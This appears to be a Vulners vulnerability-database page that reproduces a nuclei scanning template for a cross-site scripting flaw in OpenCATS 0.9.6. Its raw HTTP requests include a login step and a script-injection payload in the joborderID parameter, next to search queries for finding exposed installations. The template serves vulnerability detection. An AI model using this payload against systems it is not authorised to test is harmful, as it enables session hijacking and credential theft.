Lucene search
K

OpenCATS 0.9.6 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

OpenCATS 0.9.6 - Cross-Site Scripting via joborderID parameter allows attacker to execute malicious scripts in victim's browser. Upgrade to patched version or apply security patches

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the OpenCATS personnel recruitment system lies in the lack of measures to protect the website structure, allowing attackers to carry out cross-site scripting attacks.
15 Dec 202300:00
bdu_fstec
Circl
CVE-2022-43014
19 Oct 202222:15
circl
CNNVD
OpenCats 跨站脚本漏洞
19 Oct 202200:00
cnnvd
CNVD
OpenCATS Cross-Site Scripting Vulnerability (CNVD-2022-70587)
20 Oct 202200:00
cnvd
CVE
CVE-2022-43014
19 Oct 202200:00
cve
Cvelist
CVE-2022-43014
19 Oct 202200:00
cvelist
EUVD
EUVD-2022-46063
3 Oct 202520:07
euvd
NVD
CVE-2022-43014
19 Oct 202218:15
nvd
OSV
CVE-2022-43014
19 Oct 202218:15
osv
Prion
Cross site scripting
19 Oct 202218:15
prion
Rows per page
id: CVE-2022-43014

info:
  name: OpenCATS 0.9.6 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43014
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-43014
    cwe-id: CWE-79
    epss-score: 0.01278
    epss-percentile: 0.66426
    cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"OpenCATS"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve2022,cve,xss,opencats,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php?m=login&a=attemptLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /ajax.php?f=getPipelineJobOrder&joborderID=1)"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'CATS='
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008380c10604d9e0930e0e6d37c3f8a2db43521df09b473d0232e6dca8a63ae2db02203a55d1d96bbbee7a6bca66f41725790c79b093182e8bdc695973248141cff979:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation